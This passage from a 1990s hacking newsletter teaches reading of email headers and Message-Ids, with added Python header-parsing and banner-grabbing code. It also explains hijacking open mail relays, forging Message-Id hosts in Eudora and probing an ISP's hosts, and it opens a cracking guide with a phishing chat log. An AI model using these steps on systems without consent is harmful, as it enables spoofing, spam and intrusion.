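Reading a chain of Received: lines by hand, as we just did, is the best way to learn them, but once you know the pattern you will want a program to do the tedious part. Here is one as an added example, written for this edition and not code from the original Guide. SAMPLE is a constructed message modelled on the fubarred header walked through above, with the recipient the text says was in the "for" clauses put back in; the field names, the function names and the clause grammar (from / by / with / id / for, then a semicolon and the date, per RFC 822) are my choices. It extracts every host the message passed through, checks the timing between hops, and pulls the generating host out of the Message-Id.

```python
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Added example. SAMPLE is constructed from the fubarred header walked through
# in the Guide, with the recipient address the text says was in the "for"
# clauses restored; nothing here is a real message.
SAMPLE = """\
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)
 for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP
 (950413.SGI.8.6.12/951211.SGI) for <hacker@techbroker.com> id OAA18967;
 Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230])
 by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) for <hacker@techbroker.com>;
 Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no;
 Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com

Hello.
"""

# Clauses of a Received: line (RFC 822 section 4.3.2): from / by / via / with /
# id / for, then a semicolon and the date stamp.
FROM_RX = re.compile(r'(?:^|\s)from\s+(?P<host>\S+)(?:\s+\((?P<info>[^)]*)\))?')
CLAUSE_RX = {
    'by':   re.compile(r'\bby\s+(\S+)'),
    'with': re.compile(r'\bwith\s+(\S+)'),
    'id':   re.compile(r'\bid\s+(\S+)'),
    'for':  re.compile(r'\bfor\s+<?([^\s<>;]+@[^\s<>;]+)>?'),
}
BRACKET_IP_RX = re.compile(r'\[([^\]]+)\]')
MESSAGE_ID_RX = re.compile(r'<(?P<local>[^@>]+)@(?P<host>[^>]+)>')


def parse_received(value):
    """Split one Received: header value into its clauses and date."""
    value = ' '.join(value.split())           # undo header folding
    if ';' in value:
        clauses, date = value.rsplit(';', 1)
    else:
        clauses, date = value, ''
    hop = {'from': None, 'from_ip': None, 'date': None, 'raw': value}
    m = FROM_RX.search(clauses)
    if m:
        hop['from'] = m['host']
        ip = BRACKET_IP_RX.search(m['info'] or '')
        hop['from_ip'] = ip.group(1) if ip else None
    for key, rx in CLAUSE_RX.items():
        m = rx.search(clauses)
        hop[key] = m.group(1) if m else None
    try:
        hop['date'] = parsedate_to_datetime(date.strip()) if date.strip() else None
    except (TypeError, ValueError):
        hop['date'] = None
    return hop


def received_chain(raw_message):
    """Hops in the order the message travelled (bottom Received: line first)."""
    msg = message_from_string(raw_message)
    hops = [parse_received(v) for v in msg.get_all('Received', [])]
    hops.reverse()
    return hops


def hosts_in_path(raw_message):
    """Every host named in the chain, in order, skipping the loopback name."""
    seen = []
    for hop in received_chain(raw_message):
        for name in (hop['from'], hop['by']):
            if name and name != 'localhost' and name not in seen:
                seen.append(name)
    return seen


def hop_delays(raw_message):
    """Seconds between consecutive stamps. A negative value means one host's
    clock is off, or a line was forged by someone who did not do the math."""
    stamps = [h['date'] for h in received_chain(raw_message) if h['date']]
    return [int((b - a).total_seconds()) for a, b in zip(stamps, stamps[1:])]


def parse_message_id(raw_message):
    """Return the host that generated the Message-Id and its local part."""
    m = MESSAGE_ID_RX.search(message_from_string(raw_message).get('Message-Id', ''))
    if not m:
        return None
    return {'host': m['host'], 'local': m['local'], 'stamp': m['local'].split('.')[0]}


if __name__ == '__main__':
    for hop in received_chain(SAMPLE):
        print('%-22s -> %-22s ip=%-16s id=%s' % (hop['from'], hop['by'], hop['from_ip'], hop['id']))
    print('hosts:', hosts_in_path(SAMPLE))
    print('delays:', hop_delays(SAMPLE))
    print('message-id:', parse_message_id(SAMPLE))
```

On the sample it lists gyllir.ifi.foobar.no, ifi.foobar.no and o200.fooway.net as the route, reports the hops as 3, 2 and 8 seconds apart once every stamp is converted to the same time zone, and reads ifi.foobar.no out of the Message-Id. Feed it a forged header and the first thing that usually gives the game away is a hop delay that goes negative or a "from" host whose bracketed IP does not belong to the name in front of it.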
Some sysadmins will archive the message IDs in case they need to find out who may have been abusing their email system. But the default setting for some systems, for example those using sendmail, is to not archive. Unfortunately, an Internet host that doesn't archive these message IDs is creating a potential haven for email criminals.

Now we will leave the University of Oslo and move on to a header that hides a surprise.

Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for ; Sun, 27 Apr 1997 23:07:01 GMT
Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400
Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com>
X-Sender: cmeinel@fubaretta.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: galfina@Fubarino.com
From: "Carolyn P. Meinel"
Subject: Sample header
Date: 27 Apr 1997 22:53:37 -0400

Let's look at the first line:

Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for ; Sun, 27 Apr 1997 23:07:01 GMT

This first line tells us that it was received by the email account "galfina@Fubarino.com". That's the "for " part. The Internet host computer that sent the email to galfina was mail6.foo1.csi.com [149.xxx.183.75]. This computer name is given first in a form easily (ha, hah!) read by humans followed by the version of its name that a computer can more easily translate into the 0's and 1's that computers understand. The "NIH2WAAF" in front of it is the name the sending machine announced for itself when it said HELO; the receiving host put what it actually saw, the reverse DNS name and the IP address, in the parentheses. Anyone can say anything in HELO, so when the two disagree badly, be suspicious, and trust the part in parentheses.

"Galfina" is my user name. I chose it in order to irritate G.A.L.F. (Gray Areas Liberation Front). "Fubarino.com (8.8.3/8.6.9)" is the name of the computer that received the email for my galfina account. But notice it is a very partial computer name. All we get is a domain name and not the name of the computer from which I download my email.
We can guess that Fubarino.com is not the full name because Fubarino is a big enough ISP to have several computers on a LAN to serve all its users.

**************************************************
Evil genius tip: Want to find out the names of some of the computers on your ISP's LAN? Commands that can dredge some of them up include the Unix commands traceroute, dig, and who. For example, I explored the Fubarino.com LAN and found free.Fubarino.com (from the command "dig Fubarino.com"); and then dialin.Fubarino.com and milnet.Fubarino.com (from "who" given while logged in to my galfina account). Then, using the numerical addresses given by the dig command for these Fubarino.com computers, I was able, by checking nearby numbers, to find a whole bunch more names of Fubarino.com computers.
**************************************************

The number after Fubarino.com is not a numerical IP address. It is the designation of the version of the mail program it runs. We can guess from these numbers 8.8.3/8.6.9 that it refers to the Sendmail program. But just to make sure, we try the command "telnet Fubarino.com 25." This gives us the answer:

220 Fubarino.com ESMTP Sendmail 8.8.3/8.6.9 ready at Mon, 28 Apr 1997 09:55:58 GMT

So from this we know Fubarino.com is running the Sendmail program.

**************************************************
Evil genius tip: Sendmail is notorious for flaws that you can use to gain root access to a computer. So even though Fubarino.com is using a version of sendmail that has been fixed from its most recently publicized security holes, if you are patient a new exploit will almost certainly come out within the next few months. The cure for this problem may possibly be to run qmail, which so far hasn't had embarrassing problems.
**************************************************

OK, now let's look at the next "Received" line in that header:

Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400

CISPPP stands for a Compuserve Information Services point-to-point protocol (PPP) connection. This means that the mail was sent from a PPP connection I set up through Compuserve. We also see that Compuserve uses the Microsoft SMTPSVC mail program.

However, we see from the rest of the header that the sender (me) didn't use the standard Compuserve mail interface:

Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com>

The number 2.2.16. was inserted by Eudora, and means I am using Eudora Pro 2.2, 16-bit version. The 19970428082132 is the time I sent the email, in order of year (1997), month (04), day (28) and time (08:21:32).

The portion of the message ID "2cdf544e@fubaretta.com" is the part most people misread. It looks as if a mail server at fubaretta.com issued it and kept a record of it. It didn't. Eudora made up the whole message ID on my PC: the version number, the time, a hex value, and, for the part after the "@", the host name of whatever POP account I had typed into Eudora's settings. Did you notice this message ID points at fubaretta.com and not at Compuserve? That is only because fubaretta.com is the POP server I specified in Eudora. Since Compuserve does not yet offer POP servers, I can only use Eudora to send email over a Compuserve connection but not to receive Compuserve email. So, heck, I can specify an arbitrary POP server when I send email over Compuserve from Eudora. I picked the Fubaretta ISP. So there!

If I were to have done something bad news with that email such as spamming, extortion or email bombing, a sysadmin who went to fubaretta.com to look up that message ID would come up empty, because no computer at fubaretta.com ever handled the message. The hosts that did handle it, and that could have a log tying that message ID to my Compuserve connection, are the ones named in the "Received" lines: csi.com and Fubarino.com. That assumes, of course, that they are archiving message IDs. So when you read this part of the header you might think that the computer where I pick up my email is with the Fubaretta.com ISP.
But all this really means is that I specified to Eudora that I was using a mail account at Fubar. If I had put a different account name there, I would have generated a different message ID. Did I need to have an account at Fubaretta? No. The mail server did not ask for a password. In fact, I don't have an account at Fubaretta.

The rest of the header is information provided by Eudora:

X-Sender: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

The "X-Mailer" information tells you I was using the 16-bit version of Windows Eudora Pro Version 2.2. Some people have asked me why I don't use the 32-bit version (which runs on Win 95) instead of the 16-bit version. Answer: better error handling! That's the same reason I don't normally use Pegasus. Also, Eudora lets me get away with stuph:)

MIME (Multipurpose Internet Mail Extensions) is the standard that tells a mail program what kind of content a message holds and how its bytes are encoded. Those of you who got lots of garbage when I sent out the GTMHH and the Digest can blame it on MIME. If your email program doesn't understand MIME, you get stuff like "=92" instead of what I tried to send: that is the "quoted-printable" encoding spelling out one non-ASCII character (here a Windows-style curly apostrophe) as an equals sign followed by two hex digits. But this time I turned off the quoted-printable feature in Eudora. So this time I hope I sent all you guys plain, friendly ASCII. Please email me if what you got was still messed up, OK?

The character set "us-ascii" tells us what character set this email will use. Some email uses an ISO character set such as ISO-8859-1 (Latin-1) instead, generally if it originates outside the US.

Now let's look at a slightly more exciting header. In fact, this is a genuine muhahaha header. Remember that war I declared on Web sites that provide downloads of email bombing programs? You know, those Windows 95 for lusers programs that run from a few mouse clicks? Here's a header that reveals my tiny contribution toward making life unpleasant for the ISPs that distribute these programs.
It's from the Happy Hacker Digest, April 12, 1997, from a copy that reached a test email address I had on the list:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400
Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400
Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel"
Subject: Happy Hacker Digest April 12, 1997

Now let's examine the first two fields:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400
Date: Mon, 14 Apr 1997 12:05:22 -0400

We already looked at this computer o200.fooway.net above. But, heck, let's probe a little more deeply. Since I suspect this is a POP server, I'm going to telnet to port 110, which is normally the POP server port.

> telnet o200.fooway.net 110
Trying 207.xxx.192.57...
Connected to o200.fooway.net.
Escape character is '^]'.
+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at mail starting.

Now we know more about Fooway Technology's POP server. If you have ever run one of those hacker "strobe" type programs that tell you what programs are running on each port of a computer, there is really no big deal to it. They just automate the process that we are doing here by hand. But in my humble opinion you will learn much more by strobing ports by hand the same way I am doing here. Now we could do lots more strobing, but I'm getting bored.
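Here is the by-hand strobing from this section, and the "port scanning by hand" advice in the cracking guide further down, turned into a small program. This is an added example and not part of the original Guide. The grab_banner function really connects; the RECORDED table replays the two greetings quoted above so the fingerprinting can be tried offline. The banner patterns are assumptions drawn from those two greetings, not a general fingerprint database.

```python
import re
import socket


def grab_banner(host, port, timeout=5.0):
    """Open a TCP connection and return whatever greeting the daemon volunteers.
    This is the "telnet host 25" step from the text, minus the typing. Returns None
    when the port is closed, filtered, or silent within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            data = sock.recv(512)
    except OSError:          # refused, unreachable, or timed out
        return None
    return data.decode("ascii", "replace").strip() or None


# Patterns for the two greetings seen in the text. Assumed formats; real strobe
# tools carry hundreds of these.
BANNER_RULES = (
    (25, "smtp", re.compile(
        r"^220 (?P<host>\S+) (?P<esmtp>ESMTP )?(?P<soft>Sendmail) (?P<ver>\S+)")),
    (110, "pop3", re.compile(
        r"^\+OK (?P<soft>QUALCOMM Pop server)[^(]*\(version (?P<ver>[^)]+)\)")),
)


def fingerprint(port, banner):
    """Classify one greeting. Unknown banners are returned raw rather than guessed at."""
    if banner is None:
        return {"port": port, "state": "closed-or-silent"}
    for rule_port, service, pattern in BANNER_RULES:
        match = pattern.match(banner)
        if rule_port == port and match:
            fields = match.groupdict()
            info = {"port": port, "state": "open", "service": service,
                    "software": fields["soft"], "version": fields["ver"],
                    "esmtp": bool(fields.get("esmtp"))}
            # Sendmail's "8.8.3/8.6.9" is program version / configuration-file version
            if fields["soft"] == "Sendmail" and "/" in fields["ver"]:
                info["binary_version"], info["config_version"] = fields["ver"].split("/", 1)
            return info
    return {"port": port, "state": "open", "service": "unknown", "raw": banner}


def strobe(host, ports, fetch=grab_banner):
    """One banner per port, in order. `fetch` is injectable so recorded greetings
    can be replayed without touching the network."""
    return [fingerprint(port, fetch(host, port)) for port in ports]


# Constructed replay of the greetings quoted in the text, keyed by (host, port).
RECORDED = {
    ("Fubarino.com", 25):
        "220 Fubarino.com ESMTP Sendmail 8.8.3/8.6.9 ready at Mon, 28 Apr 1997 09:55:58 GMT",
    ("o200.fooway.net", 110):
        "+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at mail starting.",
}


def replay(host, port):
    """Stand-in for grab_banner that answers only from RECORDED."""
    return RECORDED.get((host, port))


if __name__ == "__main__":
    for result in strobe("Fubarino.com", [25, 110], fetch=replay):
        print(result)
```

Against a live host, call strobe(host, [21, 25, 110]) with the default fetch. Do that only against machines whose owners have said you may probe them, for the reasons the cracking guide below spells out.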
So we check out the second field in this header:

Date: Mon, 14 Apr 1997 12:05:22 -0400

That -0400 is not a correction applied to anything else in the header. It is the offset of the sending computer's clock from Greenwich Mean Time (UTC): four hours behind, which is US Eastern Daylight Time. To compare times from different hops you add the offset back, so 12:05:22 -0400 is 16:05:22 GMT.

Let's see the next field in the header:

Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400

Hmmm, why is mocha.icefubarnet.com in the header? If this header isn't forged, it means this mail server was handling the Happy Hacker Digest mailing. So where is mocha.icefubarnet.com located? A quick use of the whois command tells us:

> whois icefubarnet.com
ICEFUBARNET INTERNET, INC (ICEFUBARNET-DOM)
2178 Fooway
North Bar, Oregon 97xxx
USA

Oregon is three time zones west of the East Coast computer o200.fooway.net, and sure enough, mocha stamps its own "Received" line (the next one down) with -0700, Pacific Daylight Time, while o200 stamps its lines with -0400. Converted to GMT, mocha took the message in at 15:51:02 and o200 received it from mocha at 16:05:20, fourteen minutes later, and o200 dropped it in my mailbox five seconds after that. When the stamps on a chain of "Received" lines don't line up like this once you convert them all to GMT, you are looking at either a badly set clock or a forged line.

Next field on the header tells us:

Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700

This tells us that the Happy Hacker Digest was delivered to the mail server (SMTP stands for Simple Mail Transfer Protocol) at mocha.icefubarnet.com from a Compuserve address. But, and this is very important to observe, once again I did not use the Compuserve mail system. This merely represents a PPP session I set up with Compuserve. How can you tell? Playing with nslookup shows that the numerical address of my Compuserve connection belongs to a dial-up pool, not to a permanent Internet host that runs a mail server. But you can't learn much more easily because Compuserve has great security -- one reason I use it. But take my word for it, this is another way to see a Compuserve PPP session in a header.

Now we get to the biggie, the message ID:

Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>

Whoa, how come that ID is at the computer mail.fooway.net? It's pretty simple. In Eudora I specified my POP server as mail.fooway.net.
But if you were to do a little strobing, you would discover that while fooway.net has a POP server, it doesn't have an SMTP or ESMTP server. You can get mail from Fooway, but you can't mail stuff out from Fooway. Eudora didn't send anything to mail.fooway.net either. Eudora Pro 2.2 simply writes the name of whatever POP server you configured into the message ID it generates on your PC, whether or not that computer ever sees the message. On the message ID, the "2.2.16" was inserted by Eudora. That signifies it is the 2.2 version for a 16-bit operating system.

The remaining fields of the header were all inserted by Eudora:

X-Sender: techbr@mail.fooway.net (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
To: (Recipient list suppressed)
From: "Carolyn P. Meinel"
Subject: Happy Hacker Digest April 12, 1997

Notice Eudora does let us know that techbr@mail.fooway.net is unverified as sender. And in fact, it definitely is not the sender. This is a very important fact. The message ID of an email is not necessarily stored with the computer that sent it out. The only computers that can vouch for where a message came from are the ones that stamped the "Received" lines, and even those are only as trustworthy as the hosts that wrote them.

So how was I able to use Icefubarnet Internet's mail server to send out the Happy Hacker Digest? Fortunately Eudora's naivete makes it easy for me to use any mail server that has an open SMTP or ESMTP port. You may be surprised to discover that there are uncountable Internet mail servers (the term for them is "open relays") that you may easily commandeer to send out your email -- if you have the right program -- or if you know how to telnet to port 25 (which runs the SMTP or ESMTP protocol) and give the commands to send email yourself.

Why did I use Icefubarnet? Because at the time it was hosting an ftp site that was being used to download email bomber programs (http://www.icefubarnet.com/~astorm/uy4beta1.zip). Last time I checked, the owner of the account from which he was offering this ugly stuff was unhappy because Icefubarnet Internet had made him take it down.

But -- back to how to commandeer mail servers while sending your message IDs elsewhere.
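Everything this section did by eye, the added example below does in code: it reads a header, walks the "Received" lines from the bottom up, converts each time stamp to GMT so the -0400 and -0700 hops can be compared, and takes the Eudora message ID apart to show that the host after the "@" is nothing more than the configured POP server. This is not Carolyn Meinel's code and not part of the Guide. The sample header is a retyped, constructed copy of the Happy Hacker Digest header above, with the elided "for" address of the middle hop left out.

```python
import re
from datetime import datetime, timezone
from email.parser import HeaderParser
from email.utils import parsedate_to_datetime

# Constructed test input: the Happy Hacker Digest header from the text, retyped. The
# hosts are the text's pseudonyms; the "for <address>" clause elided there is left out.
SAMPLE_HEADER = (
    "Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net"
    " id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400\n"
    "Date: Mon, 14 Apr 1997 12:05:22 -0400\n"
    "Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP"
    " (950413.SGI.8.6.12/951211.SGI) id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400\n"
    "Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211])"
    " by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428;"
    " Mon, 14 Apr 1997 08:51:02 -0700\n"
    "Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>\n"
    "X-Sender: techbr@mail.fooway.net (Unverified)\n"
    "X-Mailer: Windows Eudora Pro Version 2.2 (16)\n"
    "Subject: Happy Hacker Digest April 12, 1997\n"
)

RECEIVED_RE = re.compile(
    r"^(?:from\s+(?P<helo>\S+)(?P<extra>.*?))?\s*\bby\s+(?P<by>\S+)(?P<rest>.*?)"
    r";\s*(?P<date>[^;]+)$",
    re.S,
)
# Eudora 2.x layout: <mailer-version . YYYYMMDDhhmmss . hex . POP-host>
MSGID_RE = re.compile(
    r"<?(?P<ver>\d+\.\d+\.\d+)\.(?P<stamp>\d{14})\.(?P<hex>[0-9a-f]+)@(?P<host>[^>]+)>?")


def parse_received(value):
    """Split one Received: line into the pieces a header reader cares about."""
    text = " ".join(value.split())                      # unfold continuation lines
    match = RECEIVED_RE.match(text)
    if match is None:
        raise ValueError("unparseable Received: line: " + text)
    extra = match.group("extra") or ""
    rdns = re.search(r"\(([^\s\[\]()]+)", extra)        # name the receiver looked up
    ip = re.search(r"\[([^\]]+)\]", extra)              # address the receiver saw
    when = parsedate_to_datetime(match.group("date").strip())
    if when.tzinfo is None:                             # "-0000" stamps come back naive
        when = when.replace(tzinfo=timezone.utc)
    return {
        "helo": match.group("helo"),                    # name the sender *claimed*
        "rdns": rdns.group(1) if rdns else None,
        "ip": ip.group(1) if ip else None,
        "by": match.group("by"),
        "utc": when.astimezone(timezone.utc),
    }


def trace_delivery(header_text):
    """Hops in the order the mail travelled (bottom Received: first), each with its
    GMT time stamp and the seconds elapsed since the previous hop."""
    msg = HeaderParser().parsestr(header_text)
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    for i, hop in enumerate(hops):
        hop["transit_s"] = (None if i == 0
                            else int((hop["utc"] - hops[i - 1]["utc"]).total_seconds()))
    return hops


def clock_anomalies(hops):
    """Relays stamped earlier than the hop before them: a bad clock or a forged line."""
    return [h["by"] for h in hops if h["transit_s"] is not None and h["transit_s"] < 0]


def decode_eudora_message_id(msgid):
    """Take a Eudora-style Message-Id apart. The host after the '@' is whatever POP
    account the user configured; it is no evidence that host ever saw the mail.
    The time stamp carries no zone information, so it is returned as Eudora wrote it."""
    match = MSGID_RE.fullmatch(msgid.strip())
    if match is None:
        return None
    return {"mailer_version": match.group("ver"),
            "local_time": datetime.strptime(match.group("stamp"), "%Y%m%d%H%M%S"),
            "pop_host": match.group("host")}


if __name__ == "__main__":
    for hop in trace_delivery(SAMPLE_HEADER):
        print(hop["utc"].strftime("%H:%M:%S GMT"), "by", hop["by"],
              "from", hop["rdns"] or hop["helo"], hop["ip"] or "", "+%ss" % hop["transit_s"])
    print(decode_eudora_message_id("<2.2.16.19970414100122.4387d20a@mail.fooway.net>"))
```

Feed trace_delivery the raw header of a suspect message and look for negative transit times, HELO names that don't match the looked-up name, and a bottom hop whose address belongs to a dial-up pool rather than to the mail server the message claims to come from.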
In Eudora, just specify your victim mail server under the hosts section of the options menu (under tools). Then, under "POP Server," specify the computer whose name you want to appear in your message ID. But if you try any of this monkey business with Pegasus, it gives a nasty error message accusing you of trying to forge email.

Of course you can always commandeer mail servers by writing your own program to do it. But that will be covered in the upcoming GTMHH on shell programming.

*********************************************
Newbie note: Shell programming? What the heck izzat? It means writing a program that uses a sequence of commands available to you in your Unix shell. If you want to be a real hacker, you *must* learn Unix! If you are serious about continuing to study these GTMHHs, you *must* either get a shell account or install some form of Unix on your home computer. You may find places where you can sign up for shell accounts through http://www.celestin.com/pocia/. Or email haxorshell@techbroker.com for information on how to sign up with a shell account that is friendly to hackers and that you may securely telnet into from your local ISP PPP dialup.
*********************************************

Hang on, Vol. 3 Number 5 will get into the really hairy stuff: how to do advanced deciphering of forged headers. Yes, how to catch that 31137 d00d who emailbombed you or spammed you!

Happy Hacking, and be good!
_________________________________________________________
Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com.
To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so!
Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
________________________________________________________

___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 5
The Dread GTMHH on Cracking
____________________________________________________________

Nowadays if you ask just about anyone what a hacker is, he or she will tell you "a person who breaks into computers." That is partly on account of news stories which make it seem like the only thing a hacker does is commit computer crime. But there also is some truth to the public view. An obsession with breaking into computers has swept the hacker world. In fact, lots of hackers make fun of the kinds of stuff I think is fun: forging email and Usenet posts and programming Easter eggs into commercial software and creating Win 95 bootup screens that say "Bill Gates' mother wears army boots."

But since everyone and his brother has been emailing me pleading for instructions on how to break into computers, here it is. The dread GTMHH on Cracking. Yes, you, too, can become a genuine computer cracker and make everyone quake in his or her boots or slippers or whatever footgear they are wearing lately.

"But, but," you say. "This list is for *legal* hacking. Sez right here in the welcome message you sent me when I signed up." Welcome to reality, Bub. Hackers fib sometimes.

************************************************
You can go to jail warning: Almost everywhere on the planet, breaking into a computer is illegal. The only exceptions are breaking into your own computer, or breaking into a computer whose owner has given you permission to try to break in. It doesn't matter if you are just quietly sneaking around doing no harm. It doesn't matter if you make some stranger's computer better.
You're still in trouble if you break in without permission.
************************************************

Honestly, this Guide really *is* about harmless hacking. You don't have to commit a crime to crack into a computer. From time to time hardy souls offer up their computers for their friends, or sometimes even the entire world, as targets for cracking. If you have permission from the owner of a computer, it is most definitely legal to break into it.

In fact, here's a really fun computer that you have permission to break into. Damien Sorder invites you to break into his Internet host computer obscure.sekurity.org.

But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How do you know I'm not just playing a mean old trick on Damien by sending out an invitation to break into his box to the 5,000 crazed readers of the Happy Hacker list?

Here's a good way to check the validity of offers to let anyone try to break into a computer. Get the domain name of the target computer, in this case obscure.sekurity.org. Then add "root@" to the domain name, for example root@obscure.sekurity.org. Email the owner of that computer. Ask him if I was fibbing about his offer. If he says I made it up, tell him he's just chicken, that if he was a real hacker he'd be happy to have thousands of clueless newbies running Satan against his box.

Just kidding:) Actually, in this case you may email info@sekurity.org for more details on Damien's offer to let one and all try to crack his box. Also, please be good guys and attack off hours (Mountain Daylight Savings Time, US) so he can use obscure.sekurity.org for other stuff during the day. Also, Damien requests "If you (or anyone) want to try to hack obscure, please mail root@sekurity.org and mention that you are doing it, and what domain you are coming from. That way I can distinguish between legit and real attacks."
We all owe you thanks, Damien, for providing a legal target for the readers of this GTMHH to test their cracking skills.

So let's assume that you have chosen a legitimate target computer to try to break into. What? Some guys say it's too hard to break into a fortified box like obscure.sekurity.org? They say it's more fun to break into a computer when they're breaking the law? They say to be a Real Hacker you must run around trashing the boxes of the cringing masses of Internet hosts? Haw, haw, sendmail 4.0! What lusers, they say. They sure taught those sendmail 4.0 dudes a lesson, right?

I say that those crackers who go searching for vulnerable computers and breaking into them are like Lounge Lizard Larry going into a bar and picking up the drunkest, ugliest gal (or guy) in the place. Yeah, we all are sure impressed. If you want to be a truly elite cracker, however, you will limit your forays to computers whose owners consent to your explorations. This can -- should! -- include your own computer.

So with this in mind -- that you want more from life than to be the Lounge Lizard Larry of the hacker world -- here are some basics of breaking into computers.

There are an amazing number of ways to break into computers. The simplest is to social engineer your way in. This generally involves lying. Here's an example.

*********************************************
From: Oracle Service Humour List
Subject: HUM: AOL Hacker Turnaround (***)

Read Newfpyr's masterful turning of the tables on a hacker... Certainly one of the best Absurd IMs we've EVER received! Newfpyr's comments are in brackets throughout.

Zabu451: Hello from America Online! I'm sorry to inform you that there has been an error in the I/O section of your account database, and this server's password information has been temporarily destroyed. We need you, the AOL user, to hit reply and type in your password. Thank you for your help.
Newfpyr: Hello! This is Server Manager #563.
I'm sorry to hear that your server has lost the password info. I mean, this has been happening too much lately. We have developed some solutions to this problem. Have you got the mail sent out to all server managers?
Zabu451: no
NewfPyr: Really? Ouch. There's been some problems with the server mailer lately. Oh, well. Here's a solution to this problem: try connecting your backup database to your main I/O port, then accessing the system restart.
Zabu451: no i still need passwords
NewfPyr: I see. Do you want me to send you the list of all the passwords of all the screen names of your server?
Zabu451: ya i want that
NewfPyr: Let me get the server manager to send it...
NewfPyr: He says I need your server manager password. Could you please type it in?
Zabu451: i dont have one
NewfPyr: What do you mean? That's the first thing every manager gets!
Zabu451: it got deleted
NewfPyr: Wow! You must be having a lot of trouble. Let me find out what server you're using...
[Note: I checked his profile. It said he was from Springfield, Mass.]
NewfPyr: Okay, your number has been tracked to an area in Springfield, Mass.
Zabu451: how did u know?!!!?!?!!?!?!?!?!??!!
NewfPyr: I used Server Tracker 5.0 . Don't you have it?
Zabu451: do you know my address!?!?!?!!?!?
NewfPyr: Of course not.
Zabu451: good
NewfPyr: I only know the number you're calling AOL from, which is from your server, right?
Zabu451: yes
NewfPyr: Good. Okay, now that we have your number, we have your address, and we are sending a repair team over there.
Zabu451: nonononono dont stop them now
NewfPyr: Why? Isn't your server down?
Zabu451: nonono its working now
NewfPyr: They're still coming, just in case.
Zabu451: STOP THEM NOW
NewfPyr: I can't break AOL Policy.
Zabu451: POEPLE ARE COMING TO MY HOUSE?!?!?!?!??
NewfPyr: No! To your server. You know, where you're calling AOL from.
Zabu451: im calling from my house
NewfPyr: But you said you where calling from the server!
Zabu451: i lied im not reely a server guy
NewfPyr: But you said you were!
Zabu451: i lied i trying to get passwords please make them stop
NewfPyr: Okay. The repair team isn't coming anymore.
Zabu451: good
NewfPyr: But a team of FBI agents is.
Zabu451: NONONONO
Zabu451: im sorry
Zabu451: ill never do it again please make them not come
